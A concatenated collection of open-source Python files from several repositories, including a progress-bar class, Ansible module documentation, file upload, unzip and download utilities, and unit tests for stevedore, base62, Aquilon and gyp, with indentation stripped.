# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from __future__ import division
from collections import deque
from datetime import timedelta
from math import ceil
from sys import stderr
from time import time
__version__ = '1.2'
class Infinite(object):
file = stderr
sma_window = 10
def __init__(self, *args, **kwargs):
self.index = 0
self.start_ts = time()
self._ts = self.start_ts
self._dt = deque(maxlen=self.sma_window)
for key, val in kwargs.items():
setattr(self, key, val)
def __getitem__(self, key):
if key.startswith('_'):
return None
return getattr(self, key, None)
@property
def avg(self):
return sum(self._dt) / len(self._dt) if self._dt else 0
@property
def elapsed(self):
return int(time() - self.start_ts)
@property
def elapsed_td(self):
return timedelta(seconds=self.elapsed)
def update(self):
pass
def start(self):
pass
def finish(self):
pass
def next(self, n=1):
if n > 0:
now = time()
dt = (now - self._ts) / n
self._dt.append(dt)
self._ts = now
self.index = self.index + n
self.update()
def iter(self, it):
for x in it:
yield x
self.next()
self.finish()
class Progress(Infinite):
def __init__(self, *args, **kwargs):
super(Progress, self).__init__(*args, **kwargs)
self.max = kwargs.get('max', 100)
@property
def eta(self):
return int(ceil(self.avg * self.remaining))
@property
def eta_td(self):
return timedelta(seconds=self.eta)
@property
def percent(self):
return self.progress * 100
@property
def progress(self):
return min(1, self.index / self.max)
@property
def remaining(self):
return max(self.max - self.index, 0)
def start(self):
self.update()
def goto(self, index):
incr = index - self.index
self.next(incr)
def iter(self, it):
try:
self.max = len(it)
except TypeError:
pass
for x in it:
yield x
self.next()
self.finish()
|
erwilan/ansible
|
refs/heads/devel
|
lib/ansible/modules/windows/win_iis_virtualdirectory.py
|
78
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Henrik Wallström <henrik@wallstroms.nu>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_iis_virtualdirectory
version_added: "2.0"
short_description: Configures a virtual directory in IIS.
description:
- Creates, Removes and configures a virtual directory in IIS.
options:
name:
description:
- The name of the virtual directory to create or remove
required: true
state:
description:
- Whether to add or remove the specified virtual directory
choices:
- absent
- present
required: false
default: present
site:
description:
- The site name under which the virtual directory is created or exists.
required: true
application:
description:
- The application under which the virtual directory is created or exists.
required: false
default: null
physical_path:
description:
- The physical path to the folder in which the new virtual directory is created. The specified folder must already exist.
required: false
default: null
author: Henrik Wallström
'''
EXAMPLES = r'''
- name: Create a virtual directory if it does not exist
win_iis_virtualdirectory:
name: somedirectory
site: somesite
state: present
physical_path: c:\virtualdirectory\some
- name: Remove a virtual directory if it exists
win_iis_virtualdirectory:
name: somedirectory
site: somesite
state: absent
- name: Create a virtual directory on an application if it does not exist
win_iis_virtualdirectory:
name: somedirectory
site: somesite
application: someapp
state: present
physical_path: c:\virtualdirectory\some
'''
|
andybarry/flight
|
refs/heads/master
|
externals/gtest/xcode/Scripts/versiongenerate.py
|
3088
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A script to prepare version informtion for use the gtest Info.plist file.
This script extracts the version information from the configure.ac file and
uses it to generate a header file containing the same information. The
#defines in this header file will be included in during the generation of
the Info.plist of the framework, giving the correct value to the version
shown in the Finder.
This script makes the following assumptions (these are faults of the script,
not problems with the Autoconf):
1. The AC_INIT macro will be contained within the first 1024 characters
of configure.ac
2. The version string will be 3 integers separated by periods and will be
surrounded by squre brackets, "[" and "]" (e.g. [1.0.1]). The first
segment represents the major version, the second represents the minor
version and the third represents the fix version.
3. No ")" character exists between the opening "(" and closing ")" of
AC_INIT, including in comments and character strings.
"""
import sys
import re
# Read the command line argument (the output directory for Version.h)
if (len(sys.argv) < 3):
print "Usage: versiongenerate.py input_dir output_dir"
sys.exit(1)
else:
input_dir = sys.argv[1]
output_dir = sys.argv[2]
# Read the first 1024 characters of the configure.ac file
config_file = open("%s/configure.ac" % input_dir, 'r')
buffer_size = 1024
opening_string = config_file.read(buffer_size)
config_file.close()
# Extract the version string from the AC_INIT macro
# The following init_expression means:
# Extract three integers separated by periods and surrounded by squre
# brackets(e.g. "[1.0.1]") between "AC_INIT(" and ")". Do not be greedy
# (*? is the non-greedy flag) since that would pull in everything between
# the first "(" and the last ")" in the file.
version_expression = re.compile(r"AC_INIT\(.*?\[(\d+)\.(\d+)\.(\d+)\].*?\)",
re.DOTALL)
version_values = version_expression.search(opening_string)
major_version = version_values.group(1)
minor_version = version_values.group(2)
fix_version = version_values.group(3)
# Write the version information to a header file to be included in the
# Info.plist file.
file_data = """//
// DO NOT MODIFY THIS FILE (but you can delete it)
//
// This file is autogenerated by the versiongenerate.py script. This script
// is executed in a "Run Script" build phase when creating gtest.framework. This
// header file is not used during compilation of C-source. Rather, it simply
// defines some version strings for substitution in the Info.plist. Because of
// this, we are not not restricted to C-syntax nor are we using include guards.
//
#define GTEST_VERSIONINFO_SHORT %s.%s
#define GTEST_VERSIONINFO_LONG %s.%s.%s
""" % (major_version, minor_version, major_version, minor_version, fix_version)
version_file = open("%s/Version.h" % output_dir, 'w')
version_file.write(file_data)
version_file.close()
|
shadyueh/pyranking
|
refs/heads/master
|
env/lib/python2.7/site-packages/django/contrib/gis/db/backends/spatialite/features.py
|
326
|
from django.contrib.gis.db.backends.base.features import BaseSpatialFeatures
from django.contrib.gis.geos import geos_version_info
from django.db.backends.sqlite3.features import \
DatabaseFeatures as SQLiteDatabaseFeatures
from django.utils.functional import cached_property
class DatabaseFeatures(BaseSpatialFeatures, SQLiteDatabaseFeatures):
supports_distance_geodetic = False
# SpatiaLite can only count vertices in LineStrings
supports_num_points_poly = False
@cached_property
def supports_initspatialmetadata_in_one_transaction(self):
# SpatiaLite 4.1+ support initializing all metadata in one transaction
# which can result in a significant performance improvement when
# creating the database.
return self.connection.ops.spatial_version >= (4, 1, 0)
@cached_property
def supports_3d_storage(self):
return geos_version_info()['version'] >= '3.3'
|
djangsters/scorched
|
refs/heads/master
|
scorched/compat.py
|
3
|
import sys
_ver = sys.version_info
is_py2 = (_ver[0] == 2)
is_py3 = (_ver[0] == 3)
if is_py2: # pragma: no cover
from urllib import (quote, unquote, quote_plus, unquote_plus, urlencode,
getproxies, proxy_bypass)
from urlparse import urlparse, urlunparse, urljoin, urlsplit, urldefrag
from urllib2 import parse_http_list
import cookielib
from Cookie import Morsel
from StringIO import StringIO
from httplib import IncompleteRead
builtin_str = str
bytes = str
str = unicode
basestring = basestring
numeric_types = (int, long, float)
elif is_py3: # pragma: no cover
from urllib.parse import (urlparse, urlunparse, urljoin, urlsplit,
urlencode, quote, unquote, quote_plus,
unquote_plus, urldefrag)
from urllib.request import parse_http_list, getproxies, proxy_bypass
from http import cookiejar as cookielib
from http.cookies import Morsel
from io import StringIO
from http.client import IncompleteRead
builtin_str = str
str = str
bytes = bytes
basestring = (str, bytes)
numeric_types = (int, float)
def python_2_unicode_compatible(cls):
"""
A decorator that defines __unicode__ and __str__ methods under Python
2. Under Python 3 it does nothing.
To support Python 2 and 3 with a single code base, define a __str__
method returning unicode text and apply this decorator to the class.
The implementation comes from django.utils.encoding.
"""
if not is_py3: # pragma: no cover
cls.__unicode__ = cls.__str__
cls.__str__ = lambda self: self.__unicode__().encode('utf-8')
return cls
|
KevinBacas/DjangoRESTHello
|
refs/heads/master
|
tutorial/tutorial/__init__.py
|
12133432
| |
johnlee175/LogcatFileReader
|
refs/heads/master
|
examples/simple_utils.py
|
1
|
#!/usr/bin/env python
import urllib
import urllib2
import re
import os
import sys
import time
# upload('http://www.mywebsite.com:8080/upload.php', {}, 'file', os.path.join('/home/john/', 'a.txt'))
def upload(http_url, form_params, file_item_name, file_path):
boundary = '-----------------%s' % hex(int(time.time() * 1000))
crlf = '\r\n'
separator = '--%s' % boundary
file_type = 'application/octet-stream'
data = []
for key in form_params.keys():
value = form_params[key]
data.append(separator)
data.append('Content-Disposition: form-data; name="%s"%s' % (key, crlf))
data.append(value)
data.append(separator)
data.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (file_item_name, os.path.basename(file_path)))
data.append('Content-Type: %s%s' % (file_type, crlf))
file_res = open(file_path)
data.append(file_res.read())
file_res.close()
data.append('%s--%s' % (separator, crlf))
http_body = crlf.join(data)
req = urllib2.Request(http_url, data=http_body)
req.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)
req.add_header('Connection', 'Keep-Alive')
resp = urllib2.urlopen(req, timeout=30)
print resp.read()
# unzip('/home/john/a.zip', '/home/john/', True)
def unzip(zip_path, extract_dir, delete_zip_on_extracted):
import zipfile
# comment following code is because of the unix file permissions lost
# zip_files = zipfile.ZipFile(zip_path, 'r')
# zip_files.extractall(extract_dir)
# zip_files.close()
if not zipfile.is_zipfile(zip_path):
print "%s is not a zip file" % zip_path
exit(0)
z = zipfile.ZipFile(zip_path)
try:
for info in z.infolist():
name = info.filename
if '..' in name:
continue
if name.startswith('/'):
name = name[1:]
target = os.path.join(extract_dir, *name.split('/'))
if not target:
continue
if name.endswith('/'): # directory
dirname = os.path.dirname(target)
if not os.path.isdir(dirname):
os.makedirs(dirname)
else: # file
dirname = os.path.dirname(target)
if not os.path.isdir(dirname):
os.makedirs(dirname)
data = z.read(info.filename)
f = open(target, 'wb')
try:
f.write(data)
finally:
f.close()
del data
unix_attributes = info.external_attr >> 16
if unix_attributes:
os.chmod(target, unix_attributes)
finally:
z.close()
if delete_zip_on_extracted:
os.remove(zip_path)
# 20161201120909
def get_curr_date_str():
return time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))
# 20161201120909
def is_valid_date_str(date_str):
try:
time.strptime(date_str, '%Y%m%d%H%M%S')
return True
except ValueError, e:
print e
return False
def remove_dir(top_dir):
if os.path.exists(top_dir):
for root, dirs, files in os.walk(top_dir, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
os.rmdir(top_dir)
def delete_file(src):
if os.path.isfile(src):
os.remove(src)
elif os.path.isdir(src):
for item in os.listdir(src):
delete_file(os.path.join(src, item))
os.rmdir(src)
# # logcat.dump.20160503082219.log
# pattern = re.compile(r'^logcat\.dump\.(\d\d\d\d\d\d\d\d\d\d\d\d\d\d)\.log$')
# def compare_file_index(a, b):
# a_num = int(pattern.match(a).group(1))
# b_num = int(pattern.match(b).group(1))
# if a_num > b_num:
# return 1
# elif a_num < b_num:
# return -1
# else:
# return 0
# merge_files('./logs/', pattern, compare_file_index)
def merge_files(folder, pattern, compare_file_index):
print 'merge all files ...'
file_list = []
for parent, dir_names, file_names in os.walk(folder):
for file_name in file_names:
if pattern.match(file_name):
file_list.append(file_name)
file_list.sort(cmp=compare_file_index)
output_path = os.path.join(folder, file_list[0])
output_fd = open(output_path, mode='a')
for log_file in file_list[1:]:
log_path = os.path.join(folder, log_file)
input_fd = open(log_path)
data = input_fd.read()
output_fd.write(data)
output_fd.flush()
input_fd.close()
del data
os.remove(log_path)
output_fd.close()
return output_path
def fetch_url_with_line(req_url):
request = urllib2.Request(req_url)
resp = urllib2.urlopen(request, timeout=30)
return resp.read().splitlines()
# download(['http://www.mywebsite.com:8080/download.php?file=a.zip'], './zips/', ['a.zip'])
def download(urls, folder, file_names):
if not os.path.exists(folder):
os.makedirs(folder)
for idx, url in enumerate(urls):
print 'downloading ' + url
file_path = os.path.join(folder, file_names[idx])
urllib.urlretrieve(url, file_path)
# def flat_map_each_file(file_name, file_path, file_ext):
# print 'file path is ' + file_path + ", including file name: " \
# + file_name + ", " + file_ext + " is filename extension"
# iter_files('/home/john/logs/', flat_map_each_file)
def iter_files(top_folder, flat_map_each_file):
for parent, dir_names, file_names in os.walk(top_folder):
for file_name in file_names:
file_path = os.path.join(parent, file_name)
file_base, file_ext = os.path.splitext(file_path)
flat_map_each_file(file_name, file_path, file_ext)
def platform_name():
if sys.platform == 'darwin':
return 'macosx'
elif sys.platform == 'linux2':
return 'linux'
elif sys.platform.find('win') >= 0:
return 'windows'
else:
return ''
def binary(name):
if os.name == 'posix':
return './' + name
elif os.name == 'nt':
return name + '.exe'
else:
return name
|
bdoner/SickRage
|
refs/heads/master
|
lib/stevedore/tests/test_test_manager.py
|
55
|
from mock import Mock, sentinel
from stevedore import (ExtensionManager, NamedExtensionManager, HookManager,
DriverManager, EnabledExtensionManager)
from stevedore.dispatch import (DispatchExtensionManager,
NameDispatchExtensionManager)
from stevedore.extension import Extension
from stevedore.tests import utils
test_extension = Extension('test_extension', None, None, None)
test_extension2 = Extension('another_one', None, None, None)
mock_entry_point = Mock(module_name='test.extension', attrs=['obj'])
a_driver = Extension('test_driver', mock_entry_point, sentinel.driver_plugin,
sentinel.driver_obj)
# base ExtensionManager
class TestTestManager(utils.TestCase):
def test_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = ExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_instance_should_have_default_namespace(self):
em = ExtensionManager.make_test_instance([])
self.assertEqual(em.namespace, 'TESTING')
def test_instance_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = ExtensionManager.make_test_instance([], namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_extension_name_should_be_listed(self):
em = ExtensionManager.make_test_instance([test_extension])
self.assertIn(test_extension.name, em.names())
def test_iterator_should_yield_extension(self):
em = ExtensionManager.make_test_instance([test_extension])
self.assertEqual(test_extension, next(iter(em)))
def test_manager_should_allow_name_access(self):
em = ExtensionManager.make_test_instance([test_extension])
self.assertEqual(test_extension, em[test_extension.name])
def test_manager_should_call(self):
em = ExtensionManager.make_test_instance([test_extension])
func = Mock()
em.map(func)
func.assert_called_once_with(test_extension)
def test_manager_should_call_all(self):
em = ExtensionManager.make_test_instance([test_extension2,
test_extension])
func = Mock()
em.map(func)
func.assert_any_call(test_extension2)
func.assert_any_call(test_extension)
def test_manager_return_values(self):
def mapped(ext, *args, **kwds):
return ext.name
em = ExtensionManager.make_test_instance([test_extension2,
test_extension])
results = em.map(mapped)
self.assertEqual(sorted(results), ['another_one', 'test_extension'])
def test_manager_should_eat_exceptions(self):
em = ExtensionManager.make_test_instance([test_extension])
func = Mock(side_effect=RuntimeError('hard coded error'))
results = em.map(func, 1, 2, a='A', b='B')
self.assertEqual(results, [])
def test_manager_should_propagate_exceptions(self):
em = ExtensionManager.make_test_instance([test_extension],
propagate_map_exceptions=True)
self.skipTest('Skipping temporarily')
func = Mock(side_effect=RuntimeError('hard coded error'))
em.map(func, 1, 2, a='A', b='B')
# NamedExtensionManager
def test_named_manager_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = NamedExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_named_manager_should_have_default_namespace(self):
em = NamedExtensionManager.make_test_instance([])
self.assertEqual(em.namespace, 'TESTING')
def test_named_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = NamedExtensionManager.make_test_instance([], namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_named_manager_should_populate_names(self):
extensions = [test_extension, test_extension2]
em = NamedExtensionManager.make_test_instance(extensions)
self.assertEqual(em.names(), ['test_extension', 'another_one'])
# HookManager
def test_hook_manager_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = HookManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_hook_manager_should_be_first_extension_name(self):
extensions = [test_extension, test_extension2]
em = HookManager.make_test_instance(extensions)
# This will raise KeyError if the names don't match
assert(em[test_extension.name])
def test_hook_manager_should_have_default_namespace(self):
em = HookManager.make_test_instance([test_extension])
self.assertEqual(em.namespace, 'TESTING')
def test_hook_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = HookManager.make_test_instance([test_extension],
namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_hook_manager_should_return_named_extensions(self):
hook1 = Extension('captain', None, None, None)
hook2 = Extension('captain', None, None, None)
em = HookManager.make_test_instance([hook1, hook2])
self.assertEqual([hook1, hook2], em['captain'])
# DriverManager
def test_driver_manager_should_use_supplied_extension(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual([a_driver], em.extensions)
def test_driver_manager_should_have_default_namespace(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(em.namespace, 'TESTING')
def test_driver_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = DriverManager.make_test_instance(a_driver, namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_instance_should_use_driver_name(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(['test_driver'], em.names())
def test_instance_call(self):
def invoke(ext, *args, **kwds):
return ext.name, args, kwds
em = DriverManager.make_test_instance(a_driver)
result = em(invoke, 'a', b='C')
self.assertEqual(result, ('test_driver', ('a',), {'b': 'C'}))
def test_instance_driver_property(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(sentinel.driver_obj, em.driver)
# EnabledExtensionManager
def test_enabled_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = EnabledExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
# DispatchExtensionManager
def test_dispatch_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = DispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_dispatch_map_should_invoke_filter_for_extensions(self):
em = DispatchExtensionManager.make_test_instance([test_extension,
test_extension2])
filter_func = Mock(return_value=False)
args = ('A',)
kw = {'big': 'Cheese'}
em.map(filter_func, None, *args, **kw)
filter_func.assert_any_call(test_extension, *args, **kw)
filter_func.assert_any_call(test_extension2, *args, **kw)
# NameDispatchExtensionManager
def test_name_dispatch_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = NameDispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_name_dispatch_instance_should_build_extension_name_map(self):
extensions = [test_extension, test_extension2]
em = NameDispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(test_extension, em.by_name[test_extension.name])
self.assertEqual(test_extension2, em.by_name[test_extension2.name])
def test_named_dispatch_map_should_invoke_filter_for_extensions(self):
em = NameDispatchExtensionManager.make_test_instance([test_extension,
test_extension2])
func = Mock()
args = ('A',)
kw = {'BIGGER': 'Cheese'}
em.map(['test_extension'], func, *args, **kw)
func.assert_called_once_with(test_extension, *args, **kw)
|
gsb-eng/tahoe-lafs
|
refs/heads/master
|
src/allmydata/test/test_base62.py
|
9
|
import random, unittest
from allmydata.util import base62, mathutil
def insecurerandstr(n):
return ''.join(map(chr, map(random.randrange, [0]*n, [256]*n)))
class T(unittest.TestCase):
def _test_num_octets_that_encode_to_this_many_chars(self, chars, octets):
assert base62.num_octets_that_encode_to_this_many_chars(chars) == octets, "%s != %s <- %s" % (octets, base62.num_octets_that_encode_to_this_many_chars(chars), chars)
def _test_ende(self, bs):
ascii=base62.b2a(bs)
bs2=base62.a2b(ascii)
assert bs2 == bs, "bs2: %s:%s, bs: %s:%s, ascii: %s:%s" % (len(bs2), `bs2`, len(bs), `bs`, len(ascii), `ascii`)
def test_num_octets_that_encode_to_this_many_chars(self):
return self._test_num_octets_that_encode_to_this_many_chars(2, 1)
return self._test_num_octets_that_encode_to_this_many_chars(3, 2)
return self._test_num_octets_that_encode_to_this_many_chars(5, 3)
return self._test_num_octets_that_encode_to_this_many_chars(6, 4)
def test_ende_0x00(self):
return self._test_ende('\x00')
def test_ende_0x01(self):
return self._test_ende('\x01')
def test_ende_0x0100(self):
return self._test_ende('\x01\x00')
def test_ende_0x000000(self):
return self._test_ende('\x00\x00\x00')
def test_ende_0x010000(self):
return self._test_ende('\x01\x00\x00')
def test_ende_randstr(self):
return self._test_ende(insecurerandstr(2**4))
def test_ende_longrandstr(self):
return self._test_ende(insecurerandstr(random.randrange(0, 2**10)))
def test_odd_sizes(self):
for j in range(2**6):
lib = random.randrange(1, 2**8)
numos = mathutil.div_ceil(lib, 8)
bs = insecurerandstr(numos)
# zero-out unused least-sig bits
if lib%8:
b=ord(bs[-1])
b = b >> (8 - (lib%8))
b = b << (8 - (lib%8))
bs = bs[:-1] + chr(b)
asl = base62.b2a_l(bs, lib)
assert len(asl) == base62.num_chars_that_this_many_octets_encode_to(numos) # the size of the base-62 encoding must be just right
bs2l = base62.a2b_l(asl, lib)
assert len(bs2l) == numos # the size of the result must be just right
assert bs == bs2l
def suite():
suite = unittest.makeSuite(T, 'test')
return suite
if __name__ == "__main__":
unittest.main()
|
jrha/aquilon
|
refs/heads/master
|
tests/broker/test_bind_client.py
|
2
|
#!/usr/bin/env python2.6
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the bind client command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
class TestBindClient(TestBrokerCommand):
"""Testing manually binding client to services.
Once a client has been bound, you can't use it to test
the auto-selection logic in make_aquilon. Those tests
are done exclusively with the chooser* services, which
should not be used here.
"""
def testbindafs(self):
command = ["bind", "client", "--hostname", "unittest02.one-nyp.ms.com",
"--service", "afs", "--instance", "q.ny.ms.com"]
(out, err) = self.successtest(command)
self.matchoutput(err,
"unittest02.one-nyp.ms.com adding binding for "
"service afs instance q.ny.ms.com",
command)
def testverifybindafs(self):
command = "show host --hostname unittest02.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out, "Template: service/afs/q.ny.ms.com", command)
def testverifycatafs(self):
command = ["cat", "--service", "afs", "--instance", "q.ny.ms.com",
"--server"]
out = self.commandtest(command)
self.searchoutput(out,
r'"clients" = list\(\s*"unittest02.one-nyp.ms.com"\s*\);',
command)
def testbinddns(self):
command = ["bind", "client", "--hostname", "unittest02.one-nyp.ms.com",
"--service", "dns", "--instance", "utdnsinstance"]
(out, err) = self.successtest(command)
self.matchoutput(err,
"unittest02.one-nyp.ms.com adding binding for "
"service dns instance utdnsinstance",
command)
def testbindutsi1(self):
command = ["bind", "client", "--hostname", "unittest00.one-nyp.ms.com",
"--service", "utsvc", "--instance", "utsi1"]
(out, err) = self.successtest(command)
self.matchoutput(err,
"unittest00.one-nyp.ms.com adding binding for "
"service utsvc instance utsi1",
command)
def testverifybindutsi1(self):
command = "show host --hostname unittest00.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out, "Template: service/utsvc/utsi1", command)
# FIXME: the broker does not populate the client list for performance
# reasons
#def testverifybindutsi1proto(self):
# command = "show service --service utsvc --instance utsi1 --format proto"
# out = self.commandtest(command.split(" "))
# msg = self.parse_service_msg(out, 1)
# svc = msg.services[0]
# self.failUnlessEqual(svc.name, "utsvc",
# "Service name mismatch: %s instead of utsvc\n" %
# svc.name)
# si = svc.serviceinstances[0]
# self.failUnlessEqual(si.name, "utsi1",
# "Service name mismatch: %s instead of utsi1\n" %
# si.name)
# clients = [host.fqdn for host in si.clients]
# self.failUnlessEqual(clients, ["unittest00.one-nyp.ms.com"],
# "Wrong list of clients for service utsvc "
# "instance utsi1: %s\n" %
# " ".join(clients))
def testbindutsi2(self):
command = ["bind", "client", "--debug",
"--hostname", "unittest02.one-nyp.ms.com",
"--service", "utsvc", "--instance", "utsi2"]
(out, err) = self.successtest(command)
self.matchoutput(err, "Creating service Chooser", command)
def testverifybindutsi2(self):
command = "show host --hostname unittest02.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out, "Template: service/utsvc/utsi2", command)
def testverifybinddns(self):
command = "show host --hostname unittest02.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out, "Template: service/dns/utdnsinstance", command)
def testbindbootserver(self):
command = ["bind", "client", "--hostname", "unittest02.one-nyp.ms.com",
"--service", "bootserver", "--instance", "np.test"]
(out, err) = self.successtest(command)
self.matchoutput(err,
"unittest02.one-nyp.ms.com adding binding for "
"service bootserver instance np.test",
command)
def testverifybindbootserver(self):
command = "show host --hostname unittest02.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out, "Template: service/bootserver/np.test", command)
def testbindntp(self):
command = ["bind", "client", "--hostname", "unittest02.one-nyp.ms.com",
"--service", "ntp", "--instance", "pa.ny.na"]
(out, err) = self.successtest(command)
self.matchoutput(err,
"unittest02.one-nyp.ms.com adding binding for "
"service ntp instance pa.ny.na",
command)
def testverifybindntp(self):
command = "show host --hostname unittest02.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out, "Template: service/ntp/pa.ny.na", command)
# For unittest00, will test that afs and dns are bound by make aquilon
# because they are required services. Checking the service map
# functionality for bind client, below.
def testbindautobootserver(self):
command = ["bind", "client", "--hostname", "unittest00.one-nyp.ms.com",
"--service", "bootserver"]
(out, err) = self.successtest(command)
self.matchoutput(err,
"unittest00.one-nyp.ms.com adding binding for "
"service bootserver instance np.test",
command)
def testverifybindautobootserver(self):
command = "show host --hostname unittest00.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out, "Template: service/bootserver/np.test", command)
def testbindautontp(self):
command = ["bind", "client", "--hostname", "unittest00.one-nyp.ms.com",
"--service", "ntp"]
(out, err) = self.successtest(command)
self.matchoutput(err,
"unittest00.one-nyp.ms.com adding binding for "
"service ntp instance pa.ny.na",
command)
def testverifybindautontp(self):
command = "show host --hostname unittest00.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out, "Template: service/ntp/pa.ny.na", command)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestBindClient)
unittest.TextTestRunner(verbosity=2).run(suite)
|
turbulenz/gyp
|
refs/heads/master
|
test/module/gyptest-default.py
|
53
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies simple build of a "Hello, world!" program with loadable modules. The
default for all platforms should be to output the loadable modules to the same
path as the executable.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('module.gyp', chdir='src')
test.build('module.gyp', test.ALL, chdir='src')
expect = """\
Hello from program.c
Hello from lib1.c
Hello from lib2.c
"""
test.run_built_executable('program', chdir='src', stdout=expect)
test.pass_test()
|
station7/xbmc
|
refs/heads/master
|
lib/libUPnP/Neptune/Extras/Scripts/GenTrustAnchorsTables.py
|
264
|
#! /usr/bin/env python
###
### Generate trust anchor tables from a text file
### like, for example, TLS-Trust-Anchors-base.crt
## and TLS-Trust-Anchors-extended.crt located under Extras/Data
###
### imports
import sys
import base64
### generate a C file with bult-in TLS trust anchors
FILE_HEADER = """/*****************************************************************
|
| Neptune - Trust Anchors
|
| This file is automatically generated by a script, do not edit!
|
| Copyright (c) 2002-2010, Axiomatic Systems, LLC.
| All rights reserved.
|
| Redistribution and use in source and binary forms, with or without
| modification, are permitted provided that the following conditions are met:
| * Redistributions of source code must retain the above copyright
| notice, this list of conditions and the following disclaimer.
| * Redistributions in binary form must reproduce the above copyright
| notice, this list of conditions and the following disclaimer in the
| documentation and/or other materials provided with the distribution.
